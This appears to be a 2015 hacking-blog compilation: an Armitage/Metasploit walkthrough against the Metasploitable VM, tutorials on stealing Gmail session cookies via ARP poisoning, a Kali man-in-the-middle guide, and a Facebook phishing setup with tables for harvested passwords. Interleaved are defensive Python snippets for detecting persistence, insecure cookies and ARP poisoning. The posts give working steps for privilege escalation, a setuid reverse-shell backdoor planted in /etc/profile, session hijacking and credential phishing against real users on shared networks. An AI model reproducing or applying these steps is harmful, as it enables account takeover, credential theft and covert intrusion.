
Friday, January 16, 2015

Hacking Linux with Armitage

Metasploit is a popular exploitation framework that has seen plenty of coverage on ethicalhacker.net. This article introduces Armitage, a new GUI for Metasploit built around the hacking process. Today, I will show you how to use Armitage to scan a Linux host, find the right exploit, exploit the host, and handle post-exploitation. By following this process, you will learn how to use Armitage and Metasploit in your own work.
The target we will use is the Metasploitable Linux virtual machine. Metasploitable contains several vulnerabilities making it a safe, and, dare I say ethical, training ground for future penetration testers.
Read the Armitage documentation to get Armitage running. Through the rest of this article, I will assume that you have Metasploitable running, Armitage is ready, and that you have downloaded this Python script that we will use later. Let’s get to work.

Armitage’s User Interface

The Armitage user interface has three parts. The modules area lets you search and launch any of Metasploit’s modules. The targets area displays your active targets and sessions. Below the modules and targets are the tabs. Each dialog, shell, and console is opened in its own tab.
[Figure: The Armitage User Interface]

Scanning

Before we can attack a host, we must first perform our reconnaissance step. Armitage provides several tools for this in the Hosts menu. You can import a vulnerability or port scan, launch NMap, or launch Metasploit’s discovery modules.
I recommend launching NMap outside of Armitage and importing the results. By doing this, you will get feedback on the scan while it runs. To launch a full port scan with OS detection and service identification, use:
nmap -p 1-65535 -T5 -A -v 172.16.146.0/24 -oX scan.xml
Replace 172.16.146.0/24 with your network description or the IP address of Metasploitable. Once the scan is complete, import it into Armitage. Go to Hosts -> Import Hosts -> Nmap Scan Results and select your file. You will now see the Metasploitable Linux box in the Armitage targets view.
[Figure: A Host]
To view the results of the NMap scan: right-click the host and select Services. This will bring up a tab showing the results of our scan. The results are grouped into name, port, proto, and info columns.
[Figure: Metasploitable’s Services]
The name column is the name of the service nmap identified on the scanned port. Proto tells you if the service detected uses the UDP or TCP protocol. The port number lets you know which port we’re talking about. And finally, the info column gives you a banner grab from the port. This is very important as it helps us identify which service is running on that port. We’ll use this information to come up with attack options.
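The Services tab above is only a view over the XML that nmap’s -oX option wrote to scan.xml. As an added example (not code from the article or from Armitage), the Python script below parses that XML into the same name/port/proto/info rows, which is also how a defender can diff what a scanner sees against the expected inventory. The XML in it is a constructed sample in nmap’s format, not a real scan.

```python
"""Parse nmap -oX output into the name/port/proto/info table Armitage shows.

SAMPLE_SCAN_XML is a constructed sample (not a real scan) modelled on the
elements nmap writes: host/status/address/ports/port/state/service.
"""
import xml.etree.ElementTree as ET

SAMPLE_SCAN_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -p 1-65535 -T5 -A -v 172.16.146.0/24 -oX scan.xml">
  <host>
    <status state="up"/>
    <address addr="172.16.146.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="ProFTPD" version="1.3.1"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="open"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.X"/>
      </port>
      <port protocol="tcp" portid="8180">
        <state state="open"/>
        <service name="http" product="Apache Tomcat/Coyote JSP engine" version="1.1"/>
      </port>
      <port protocol="tcp" portid="8009">
        <state state="filtered"/>
        <service name="ajp13"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="172.16.146.11" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_services(xml_text):
    """Return (host, name, port, proto, info) rows for every open port.

    'info' mirrors the banner column: product, version and extrainfo joined,
    which is the text the article uses to tell service versions apart.
    """
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # hosts nmap could not reach have no services to list
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports carry no usable banner
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            info_parts = []
            if svc is not None:
                for key in ("product", "version", "extrainfo"):
                    if svc.get(key):
                        info_parts.append(svc.get(key))
            rows.append((addr, name, int(port.get("portid")),
                         port.get("protocol"), " ".join(info_parts)))
    # Same ordering the Services tab uses by default: host, then protocol, then port.
    return sorted(rows, key=lambda r: (r[0], r[3], r[2]))


def services_table(xml_text):
    """Render the rows as a fixed-width table like the Services tab."""
    lines = ["%-15s %-12s %6s %-5s %s" % ("host", "name", "port", "proto", "info")]
    for addr, name, port, proto, info in parse_services(xml_text):
        lines.append("%-15s %-12s %6d %-5s %s" % (addr, name, port, proto, info))
    return "\n".join(lines)


if __name__ == "__main__":
    print(services_table(SAMPLE_SCAN_XML))
```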

Attack: Simple Remote Exploitation

Metasploit has over 650 exploits. If you don’t know which one you want to use, this list may seem intimidating. Fortunately, Armitage can help narrow this list down. Go to Attacks -> Find Attacks -> by port. Armitage will analyze your hosts and build a custom attack menu for each. Wait for the "Attack analysis is complete" dialog before continuing.
Right-click on the target and you’ll notice an attack menu. The attack menu will have submenus for each exploitable service on the target host. Not all of these exploits are applicable, but these are the best candidates.
Looking at the services information (see previous section), we see that Metasploitable is running ProFTPD 1.3.1. Go to Attack -> ftp and select one of the ProFTPD exploits. Selecting an exploit will bring up a dialog with information about the exploit and options you can adjust. If you read the description, you’ll see that the ProFTPD exploits are for a different version of ProFTPD. Drats, this attack won’t work for us.
[Figure: Armitage’s Exploit Launcher Dialog]
Right-click the target again, go to Attack -> Samba -> usermap_script. You’ll notice this is for a specific version of Samba in the 3.0.20-25 range. You’ll also observe from the services tab that our target is running Samba 3.x. We don’t know the exact version it’s running. It’s worth trying the exploit. There are no settings you need to change here. Simply click launch to launch the exploit.
If you’re successful, the target host will turn red with lightning bolts. Congratulations, you’ve exploited the target! Right-click your target and select Shell 1 -> Interact to open a tab with your shell. We’ll cover this more when we get to post-exploitation.
[Figure: A Compromised Host]
If you’re familiar with Metasploit, you may be asking about other payloads. Armitage chooses the Metasploit payload for you. If you’re attacking Windows, Armitage will choose meterpreter. If you’re attacking any other operating system, Armitage will select a command shell payload. If you’re not a Metasploit warrior yet, know that exploits are the delivery mechanism and payloads are the programs that get executed on the exploited host.
Now let’s undo all that work by selecting the Console tab and typing sessions -K. This will kill all existing sessions.

Attack: Web Application Exploitation

In the future, I expect the Metasploit Framework will have a mature capability to audit and attack any web application. Today, there are several exploits for common web applications. Right-click the target, go to Attack -> Webapp to see some of them.
[Figure: So many web app exploits!]
These exploits were chosen because they’re associated with the open port on your target. Unfortunately, you may not know which of these applications are installed. This is OK, as Armitage will help again. Select the check exploits… item at the bottom of this menu.
The check exploits… command will open a console tab and run an active check of each exploit against the selected target. This is accomplished using Metasploit’s check command. Some exploits do not support this, but many of them do.
Once the checks are complete, type Ctrl+F to open a search dialog. Type vulnerable and hit enter. This search will lead you to any exploits that worked.
[Figure: Found a Working Exploit]
You’ll notice that tikiwiki_graph_formula_exec is vulnerable. Right-click the target and select Attack -> Webapp-> tikiwiki_graph_formula_exec. As we did before, click the Launch button when the dialog comes up. Now just wait for the computer to turn red.
To kill this shell, right-click the target and navigate to Shell 2 -> Disconnect.

Attack: Brute Force Login

This next attack will require a few steps. Look at port 8180 in the services tab. From the info field, we can see this port is running Apache Tomcat JSP 1.1.
Click the search field in the module browser. Type tomcat and press enter. There is one exploit for Tomcat: exploit/multi/http/tomcat_mgr_deploy. Double-click this module to open its launch dialog. If you look at the variables, you’ll notice we need a username and a password. We don’t have these yet, so close this launch dialog.
[Figure: Module Search Results]
Metasploit has several auxiliary modules for guessing usernames and passwords. These modules are usually named service_login. Looking at the module search results for tomcat, you’ll see auxiliary/http/tomcat_mgr_login. This is what we need. Double-click it to open a launch dialog.
[Figure: tomcat_mgr_login Dialog]
You’ll notice all of the parameters are set including the USERPASS_FILE option. USERPASS_FILE points to a file with a list of usernames and passwords. If you double-click this option in the Option column, Armitage will open a file chooser to let you select another file. Fortunately, this file is fine. Make sure you set RPORT to the correct value though. The target is running Tomcat on port 8180, not the default value of 8080.
[Figure: Password Guessing Output]
Click launch to start the brute force. If you read the output, you’ll notice the login is tomcat:tomcat. That’s easy enough.
Open the launcher for the tomcat_mgr_deploy exploit. Set the RPORT option to 8180 as well. Set USERNAME and PASSWORD to tomcat. Select the Target of the host. Here we’re attacking a Linux host. Click Launch and wait. Congratulations, you have obtained another shell!

Post Exploitation

Now that you’ve learned how to get access to the host, let’s talk about post exploitation. Right-click the compromised host, go to the Shell 3 menu, and select Interact to interact with the shell. This will bring the shell up in its own tab.
Standard console features apply here. You may use the up/down arrows to access your command history. You may also type Ctrl+F if you need to search through the output. If you close the tab, your shell session will still exist. You may open it again by selecting the Interact menu item again.
To find out who you are, type: id in the shell. You’ll see from the Tomcat attack that you’re tomcat55. Let’s work on getting root.

Privilege Escalation

Privilege escalation in Linux is something that depends on your environment. If you’re looking for some ideas, visit http://www.exploit-db.com and search for recent local exploits on Linux. One bug found by Tavis Ormandy stands out. This bug allows us to create a new world-writeable file owned by the root user anywhere on the system. Tavis’s example writes a file to crontab and uses that to run our desired commands as the root user. In my tests, crontab did not execute these commands on Metasploitable. This happens. So, what else can we do? Examining other recent advisories, you’ll learn about the Ubuntu mountall privilege escalation vulnerability. A bug in the mountall utility leaves a world-writeable root.rules file in /dev/.udev/rules.d. Anyone capable of writing to this file can use it to execute arbitrary commands as the root user. A quick ls reveals that root.rules doesn’t exist in this folder. Maybe this is not our lucky day.
Do you see any options? Let’s modify Tavis’s example to create a world-writeable root.rules file and get a root shell through it. Type the following commands into your target’s shell:
umask 0
export LD_AUDIT="libpcprofile.so"
export PCPROFILE_OUTPUT="/dev/.udev/rules.d/root.rules"
ping
export LD_AUDIT=""
cd /tmp
You will now have a world-writeable root.rules file in /dev/.udev/rules.d. You now need to upload mountall-CVE-2010-2961.py to the Metasploitable host. Right-click in the shell window and select the Upload… menu item. Navigate to the mountall-CVE-2010-2961.py file and click Open. Armitage will use the UNIX printf command to upload the file. Since the file is so small, the upload will be instant. If the file were larger, Armitage would display the upload progress.
This Python script populates the root.rules file with commands to create a setuid shell at /tmp/toor. It also generates UDEV events to force the system to evaluate the rules file. Run this python script on the target to get root:
python mountall-CVE-2010-2961.py
whoami 
[Figure: Armitage Privilege Escalation]
Congratulations, you’re now root. Make sure to cover your tracks by deleting the root.rules, the mountall-CVE-2010-2961.py, and /tmp/toor files.

Persistence

Once you have root, the next step is to add a backdoor to keep your access. Clear the module browser search box and hit enter. This will restore the default module list. Navigate to payload/linux/x86/shell_reverse_tcp. Double-click shell_reverse_tcp to open a launch dialog.
Here you can generate a Metasploit payload executable. Change the LPORT value to 1234. Select elf for the output type. Elf is a file format for executables on Linux. Click Launch and save the file as backdoor. Now we have a program that will connect to our attack box on port 1234 with a shell when run.
Now let’s set up a listener for our callback shell. Go to Armitage -> Listeners -> Reverse. Type 1234 as the port and click Start Listener.
Right-click in the shell window and select Upload… to upload backdoor to the target host. Type the following commands:
mv backdoor /usr/bin/setup.host
chmod +x /usr/bin/setup.host
chmod ug+s /usr/bin/setup.host
echo "setup.host &n" >>/etc/profile 
These commands add our setuid backdoor to the global profile file. When a user logs in, we will receive a root shell from our target.
Kill all shell sessions with sessions -K in the Metasploit console. Switch to the Metasploitable virtual machine. Login as the user msfadmin with the password msfadmin. If you look at Armitage, you should see a new shell session. Open it up and type whoami.
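Both artefacts the persistence steps above leave behind (a line appended to /etc/profile that starts a program in the background, and a setuid file dropped into /usr/bin) are cheap to detect. The Python check below is an added example, not code from the article: it flags backgrounded commands in a profile file and setuid binaries outside an allow-list. The profile text and the demo directory are constructed, and the baseline set stands in for the list a defender would build from their package manager.

```python
"""Detect the two persistence artefacts: a backgrounded command in a login
profile and an unexpected setuid executable in a bin directory.

SAMPLE_PROFILE and make_demo_bin_dir() are constructed so the check runs
offline; on a real host you would read /etc/profile and walk /usr/bin.
"""
import os
import stat
import tempfile

# Constructed tail of a tampered /etc/profile.
SAMPLE_PROFILE = """# /etc/profile: system-wide .profile file for the Bourne shell
if [ "${PS1-}" ]; then
  PS1='\\u@\\h:\\w\\$ '
fi
umask 022
setup.host &
"""


def suspicious_profile_lines(text):
    """Return (line_number, line) for non-comment lines that background a command.

    A login profile should set variables and source files; a trailing '&'
    means something is started as a daemon every time a user logs in.
    """
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if stripped.endswith("&") and not stripped.endswith("&&"):
            hits.append((number, stripped))
    return hits


def find_setuid(directory, baseline=frozenset()):
    """Return regular files under directory carrying setuid or setgid,
    excluding names in baseline (what the package manager is known to ship).
    """
    unexpected = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue  # raced with a deletion; nothing left to report
            if (stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID)
                    and name not in baseline):
                unexpected.append(path)
    return sorted(unexpected)


def make_demo_bin_dir():
    """Build a throwaway directory shaped like /usr/bin after the backdoor drop.

    Returns (directory, backdoor_path). 'passwd' stands in for a legitimate
    setuid binary, 'ls' for a normal one, 'setup.host' is the planted file.
    """
    directory = tempfile.mkdtemp(prefix="demo_bin_")
    for name in ("passwd", "setup.host", "ls"):
        path = os.path.join(directory, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, 0o4755 if name != "ls" else 0o755)
    return directory, os.path.join(directory, "setup.host")


if __name__ == "__main__":
    for number, line in suspicious_profile_lines(SAMPLE_PROFILE):
        print("profile line %d: %s" % (number, line))
    demo_dir, _ = make_demo_bin_dir()
    for path in find_setuid(demo_dir, baseline=frozenset({"passwd"})):
        print("unexpected setuid file: %s" % path)
```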

Conclusion

I’ve shown you how to attack a Linux machine. You saw how to use nmap to scan the target. You learned how to interpret the results of the scan to find and launch attacks. You also learned how to escalate your privileges and persist yourself.
While Metasploit and Armitage weren’t the only tools in this adventure, you can see how they aided this process. Armitage does not hack for you, but it provides tools (e.g., the printf upload feature) to make the process easier.
Some of the steps from this article are shown in the following video. Watch it to whet your appetite. To get the most out of this article, download the materials mentioned and carry out this scenario yourself. If you want to challenge yourself, try getting into Metasploitable in other ways. Good luck and happy hacking!

How to hack a Gmail account using GX Cookie

Hacking web applications has always been a fascination for script kiddies, and hacking a free web email account is every geek’s first attempt. The method I will describe in this post is not new; the same method can be applied to Yahoo and other free web email services too.

The method we will be using is cookie stealing and replaying the same cookie back to the Gmail server. There are many ways you can steal a cookie; one of them is XSS (cross-site scripting), discussed by others in an earlier post. But we won’t be using any XSS here. In our version of the attack we will use some local tools to steal the cookie and then use that cookie to get access to the Gmail account.

Assumption:
  • You are on a Local Area Network (LAN) in a switched or wireless environment, for example an office, cyber café or mall.
  • You know basic networking.

Tool used for this attack:
  • Cain & Abel
  • Network Miner
  • Firefox web browser with Cookie Editor add-ons

Attack in detail:

We assume you are connected to a LAN or wireless network. Our main goal is to capture the Gmail GX cookie from the network. We can only capture the cookie when someone is actually using Gmail. I’ve noticed that in an office, people normally check their email at lunch time or at the start of a shift. If you are in a cyber café or mall, there are more chances of catching people using Gmail.

We will go step by step.
If you are using a wireless network, you can skip Step A.

A] Using Cain to do ARP poisoning and routing:



A switch passes unicast traffic only to the port it is destined for. When X and Y are communicating with each other on a switched network, Z will not see what X and Y are saying, so in order to sniff that communication you have to poison the ARP entries for X and Y. On wireless you don’t have to do poisoning, because a wireless access point acts like a hub, which forwards any communication to all its ports (recipients).
  • Start Cain from Start > Program > Cain > Cain
  • Click on the Start/Stop Sniffer tool icon in the tool bar. We will first scan the network to see which IPs are in use; this list will also help us launch the attack on the victim.
  • Then click on the Sniffer tab, then the Hosts tab below it. Right-click within that spreadsheet and click on Scan MAC Addresses; from the Target section select All hosts in my subnet and then press OK. This will list all hosts connected to your network. You will notice that your own machine’s physical IP does not appear in that list.
How to check your physical IP?
> Click on Start > Run, type cmd and press Enter. In the command prompt, type
ipconfig and press Enter. This shows the IP address assigned to your PC.
It will have the following output:


Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : xyz.com
IP Address. . . . . . . . . . . . : 192.168.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
Main thing to know here is your IP address and your Default Gateway.

Make a note of your IP address and default gateway. In Cain you will see a list of IP addresses; here you have to choose a free IP address that is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.

  • Click on Configure > APR > Use Spoofed IP and MAC Address > IP.
Type in 192.168.1.10, then from the poisoning section click on “Use ARP Request Packets” and click on OK.

  • Within the Sniffer tab, click on the APR tab below, then click on APR on the left-hand side. Now click on the top right-hand spreadsheet and click on the plus sign tool at the top. The moment you click it, it will show you a list of IP addresses on the left-hand side. Here we will target the victim IP address and the default gateway.

The purpose is to do ARP poisoning between the victim and the default gateway and route the victim’s traffic via your machine. From the left side click on the victim IP address; we assume the victim is using 192.168.1.15. The moment you click on the victim IP you will see the remaining list on the right-hand side; here you have to select the default gateway IP address, i.e. 192.168.1.1, then click on OK.
  • Finally, click on the Start/Stop Sniffer tool menu once again and then click on Start/Stop APR. This will start poisoning the victim and the default gateway.

B] Using Network Miner to capture cookie in plain text



We are using Network Miner to capture the cookie, but Network Miner can be used for many things, from capturing text, images and HTTP parameters to files. Network Miner is normally used in passive reconnaissance to collect the IP, domain and OS fingerprint of the devices connected to your machine. If you don’t have Network Miner you can use any other sniffer available, like Wireshark, Iris Network Scanner, NetWitness etc.

We are using this tool because of its ease of use.

  • Open Network Miner by clicking its exe (note that it requires the .NET Framework to work).
  • From the “---Select network adaptor in the list---” drop-down, click the down arrow and select your adaptor. If you are using a wired Ethernet network, your adaptor will have an Ethernet name and your machine’s IP address; if you are using wireless, the adaptor name will contain “wireless” and your IP address. Select the one you are using and click on Start.
Important: before you start, make sure you are not browsing any websites or using any instant messaging, and that you have cleared all cookies from Firefox.
  • Click on the Credentials tab above. This tab will capture all HTTP cookies; pay close attention to the “Host” column, where you should see mail.google.com somewhere. If you can locate the mail.google.com entry, right-click the Username column of that entry and click on “copy username”, then open Notepad and paste the copied content there.
  • Remove word wrap in Notepad and search for GX in the line. The cookie you captured will contain many cookies from Gmail, each separated by a semicolon. The GX cookie will start with GX= and end with a semicolon; you have to copy everything between the = and the semicolon.
Example: GX= axcvb1mzdwkfefv ; <- copy only axcvb1mzdwkfefv

Now that we have captured the GX cookie, it’s time to use this cookie to replay the attack and log in to the victim’s email account. For this we will use Firefox and the Cookie Editor add-on.

C] Using Firefox & cookie Editor to replay attack.



  • Open Firefox and log in to your own Gmail account.
  • From Firefox click on Tools > Cookie Editor.
  • In the filter box type .google.com and press Filter, then from the list below search for the cookie named GX. If you locate GX, double-click that GX cookie, delete everything in the Content box, paste the GX cookie you captured in step B.4, click Save and then Close.
  • In the Firefox address bar type mail.google.com and press Enter. This replays the victim’s GX cookie to the Gmail server and you will be logged in to the victim’s Gmail account.
  • Sorry! You can’t change the password with a cookie attack.

How to be protected from this kind of attack?
Google has provided a way out of this attack: you can use a secure cookie instead of an insecure one. You can enable the secure cookie option to always use HTTPS from the Gmail settings:
Settings > Browser connection > Always use https

How to Hack an Email Account with Cookies


If you are a newbie and don’t know about cookies, then for your information, a cookie is a piece of text stored on the user’s computer by websites the user visits. This stored cookie is used by the web server to identify and authenticate the user. So, if you steal this cookie (which is stored in the victim’s browser) and inject this stolen cookie into your browser, you can imitate the victim’s identity to the web server and enter their email account easily. This is called session hijacking. Thus, you can easily hack an email account using such cookie-stealing hacks.

Tools needed for Cookie stealing attack:

Cookie stealing attack requires two types of tools:
  1. Cookie capturing tool
  2. Cookie injecting/editing tool
1. Cookie capturing tool:
Suppose you are running your computer on a LAN. The victim too is on the same LAN. Then you can use a cookie capturing tool to sniff all the packets to and from the victim’s computer. Some of the packets contain cookie information. These packets can be decoded using the cookie capturing tool and you can easily obtain the cookie information necessary to hack the email account. Wireshark and HTTP Debugger Pro can be used to capture cookies.

Update: Check out my Wireshark tutorial for more information on cookie capturing tool.

2. Cookie injecting/editing tool:

Now, once you have successfully captured your victim’s cookies, you have to inject those cookies into your browser. This job is done using a cookie injecting tool. Also, in certain cases after injection, you need to edit cookies, which can be done with a cookie editing tool. This cookie injection/editing can be done using the simple Firefox add-on Add N Edit Cookies and Greasemonkey scripts. I will write more on these two tools in my future articles.

Drawbacks of Cookie Stealing:

Cookie stealing is often neglected because it has some serious drawbacks:
  1. A cookie has an expiry time, i.e. after a certain trigger the cookie expires and you cannot use it to hijack the victim’s session. Cookie expiry is implemented in two ways:
    1. By assigning a specific timestamp (helpful for us).
    2. By checking for triggers like the user exiting the web browser. So, in such cases, whenever the user exits their browser, the cookie expires and our captured cookie becomes useless.
  2. Cookie stealing becomes useless in an SSL-encrypted environment, i.e. for https (Secure HTTP) links. But most email accounts and social networking sites rarely use https unless the victim has manually set https as the mandatory connection type.
  3. Also, most cookies expire once the victim hits the Log Out button. So, you have to carry out this cookie stealing hack while the user is logged in. But I think this is not such a serious drawback, because most of us have the habit of checking "Remember Me". So very few people actually log out of their accounts on their PCs.
So friends, this was a short tutorial on the basics of how to hack an email account using cookie stealing. As I have stated, cookie stealing has some disadvantages. But I think cookie stealing is a handy way to hack an email account. In my next articles, I will post detailed tutorials on hacking Facebook and Gmail accounts using cookie stealing. If you have any problem with this tutorial on how to hack an email account using cookie stealing, please mention it in the comments.

Enjoy the cookie stealing trick to hack an email account.
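The one defence both cookie posts point at (the Gmail post’s “Always use https” setting and drawback 2 above) comes down to a cookie attribute: a session cookie sent only over HTTPS, and marked Secure so the browser never attaches it to an http:// request, cannot be picked up by a LAN sniffer. The Python audit below is an added example, not from either post: it parses Set-Cookie headers and reports session cookies lacking Secure and HttpOnly. The header lines are constructed samples, and SESSION_HINTS is a heuristic of my own for spotting session cookies by name.

```python
"""Audit Set-Cookie headers for session cookies that would travel in clear text.

Browser rule mirrored here: a cookie with the Secure attribute is attached
only to https requests; HttpOnly keeps page scripts from reading it.
SAMPLE_HEADERS are constructed, not captured traffic.
"""

SAMPLE_HEADERS = [
    "Set-Cookie: GX=axcvb1mzdwkfefv; Domain=.google.com; Path=/mail",
    "Set-Cookie: SID=constructed-session-id; Domain=.google.com; Path=/; Secure; HttpOnly",
    "Set-Cookie: PREF=lang=en; Domain=.google.com; Path=/; Expires=Fri, 16 Jan 2015 00:00:00 GMT",
]

# Name fragments that usually mark an authentication/session cookie (heuristic).
SESSION_HINTS = ("sid", "session", "gx", "auth", "token")


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, attributes).

    Attribute keys are lower-cased; flag attributes (Secure, HttpOnly) map to True.
    """
    if header.lower().startswith("set-cookie:"):
        header = header.split(":", 1)[1]
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value, attrs


def cookie_sent_on(attrs, scheme):
    """Would a browser attach a cookie with these attributes to a request of this scheme?"""
    scheme = scheme.lower()
    if "secure" in attrs:
        return scheme == "https"
    return scheme in ("http", "https")


def looks_like_session(name, attrs):
    """Heuristic: session-ish name and no fixed lifetime (Expires/Max-Age)."""
    named = any(hint in name.lower() for hint in SESSION_HINTS)
    persistent = "expires" in attrs or "max-age" in attrs
    return named and not persistent


def audit_cookies(headers):
    """Return [(name, [problem, ...])] for session cookies missing protections."""
    findings = []
    for header in headers:
        name, _value, attrs = parse_set_cookie(header)
        if not looks_like_session(name, attrs):
            continue
        problems = []
        if cookie_sent_on(attrs, "http"):
            problems.append("missing Secure: also sent on http:// requests, so a LAN sniffer can read it")
        if "httponly" not in attrs:
            problems.append("missing HttpOnly: readable by injected script (XSS)")
        if problems:
            findings.append((name, problems))
    return findings


if __name__ == "__main__":
    for name, problems in audit_cookies(SAMPLE_HEADERS):
        for problem in problems:
            print("%s: %s" % (name, problem))
```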

Thursday, January 15, 2015

Kali Linux in the Middle Attack

Today our tutorial will talk about the Kali Linux man in the middle attack. How do you perform a man in the middle attack using Kali Linux? We will learn the step by step process of how to do this.

I believe most of you already know about the concept of a man in the middle attack, but if you still don’t, here is a definition from Wikipedia.
The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.
Scenario:
This is the simple scenario, and I try to draw it in a picture.

Victim IP address : 192.168.8.90
Attacker network interface : eth0; with IP address : 192.168.8.93
Router IP address : 192.168.8.8

Requirements:
1. Arpspoof
2. Driftnet
3. Urlsnarf

Step by step Kali Linux Man in the Middle Attack :

1. Open your terminal (CTRL + ALT + T is the Kali shortcut) and configure our Kali Linux machine to allow packet forwarding, because to act as the man in the middle, Kali Linux must act as a router between the "real router" and the victim. Read the tutorial here on how to set up packet forwarding in Linux.
2. You can change your terminal interface to make the view friendlier and easier to monitor by splitting the Kali Linux terminal window.
3. The next step is setting up arpspoof between the victim and the router.
arpspoof -i eth0 -t 192.168.8.90 192.168.8.8

4. And then set up arpspoof to capture all packets from the router to the victim.
arpspoof -i eth0 192.168.8.8 192.168.8.90

5. After steps three and four, all packets sent or received by the victim should be going through the attacker machine.
6. Now we can try to use driftnet to monitor all of the victim’s image traffic.
Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.
7. To run driftnet, we just run this:
driftnet -i eth0
When the victim browses a website with images, driftnet will capture all image traffic as shown in the screenshot below.

To stop driftnet, just close the driftnet window or press CTRL + C in the terminal.
8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this command:
urlsnarf -i eth0
and urlsnarf will start capturing all website addresses visited by the victim machine.

9. When the victim browses a website, the attacker will know the address the victim visited.
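The poisoning in steps 3 and 4 above (and in the Cain APR section of the Gmail cookie post) has a simple network-side signature: the router’s IP starts answering from a second MAC, and that same MAC ends up claiming the gateway plus other hosts. The Python monitor below is an added detection example, not from either post; the ARP reply log it processes is constructed with made-up MAC addresses, and wiring it to a live capture is not shown.

```python
"""Detect ARP cache poisoning from a stream of ARP replies.

Two symptoms are checked: (1) an IP already bound to one MAC starts
answering from another (highest severity for the gateway), and (2) one MAC
claims the gateway IP and at least one other host, which is the relay
position a man in the middle needs. SAMPLE_ARP_REPLIES is constructed.
"""
from collections import defaultdict

GATEWAY_IP = "192.168.8.8"

# Constructed log of (time, sender IP, sender MAC) from ARP replies seen on
# the victim's segment. Entries from 10:00:05 onward are what both arpspoof
# commands produce; MAC addresses are made up.
SAMPLE_ARP_REPLIES = [
    ("10:00:01", "192.168.8.8",  "00:11:22:aa:bb:01"),  # real router
    ("10:00:02", "192.168.8.93", "00:11:22:aa:bb:93"),  # attacker host, its own address
    ("10:00:05", "192.168.8.8",  "00:11:22:aa:bb:93"),  # router IP now answered by attacker MAC
    ("10:00:06", "192.168.8.90", "00:11:22:aa:bb:93"),  # victim IP claimed by the same MAC
    ("10:00:07", "192.168.8.8",  "00:11:22:aa:bb:93"),  # repeats: arpspoof resends every 2 s
]


class ArpMonitor:
    """Tracks IP -> MAC bindings and raises alerts on the two poisoning symptoms."""

    def __init__(self, gateway_ip):
        self.gateway_ip = gateway_ip
        self.ip_to_macs = defaultdict(list)  # IP -> MACs seen claiming it, in order
        self.mac_alerted = set()             # MACs already reported as multi-claimants
        self.alerts = []                     # (time, severity, message)

    def observe(self, ts, ip, mac):
        mac = mac.lower()
        seen = self.ip_to_macs[ip]
        if mac not in seen:
            if seen:  # an IP we already know answers from a new MAC
                severity = "HIGH" if ip == self.gateway_ip else "MEDIUM"
                self.alerts.append((ts, severity, "%s changed MAC from %s to %s"
                                    % (ip, seen[-1], mac)))
            seen.append(mac)
        # Symptom 2: this MAC claims the gateway and at least one other host.
        claimed = sorted(i for i, macs in self.ip_to_macs.items() if mac in macs)
        if (self.gateway_ip in claimed and len(claimed) > 1
                and mac not in self.mac_alerted):
            self.mac_alerted.add(mac)
            others = ", ".join(i for i in claimed if i != self.gateway_ip)
            self.alerts.append((ts, "HIGH", "%s claims gateway and %s" % (mac, others)))


def run_monitor(records, gateway_ip=GATEWAY_IP):
    """Feed records through a fresh monitor and return its alerts."""
    monitor = ArpMonitor(gateway_ip)
    for ts, ip, mac in records:
        monitor.observe(ts, ip, mac)
    return monitor.alerts


if __name__ == "__main__":
    for ts, severity, message in run_monitor(SAMPLE_ARP_REPLIES):
        print("%s [%s] %s" % (ts, severity, message))
```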



Wednesday, January 7, 2015

5 Steps How to Hack Facebook Account Password

Requirement:

1. Facebook offline page (download)
2. MySQL Table Query (the MySQL table for this tutorial)
--
-- Table structure for table `fb_fail`
--

CREATE TABLE IF NOT EXISTS `fb_fail` (
  `id` int(10) NOT NULL AUTO_INCREMENT,
  `uname` varchar(255) NOT NULL,
  `pwd` varchar(255) NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `fb_login`
--

CREATE TABLE IF NOT EXISTS `fb_login` (
  `id` int(10) NOT NULL AUTO_INCREMENT,
  `uname` varchar(255) NOT NULL,
  `pwd` varchar(255) NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;

--
-- Dumping data for table `fb_login`
--

5 Steps How to Hack Facebook Account Password:

1. Download the facebook offline file from the link above.

2. Inside the facebook.rar file there are 3 files (index.php, login.php, and view.php) you need to configure 2 of them (login.php and view.php) to match with your database server configuration.

3. In this third step, you can view my previous tutorial about how to hack facebook account using phishing method (see the tutorial here)
4. This is the fake facebook page interface preview screenshot using my browser.

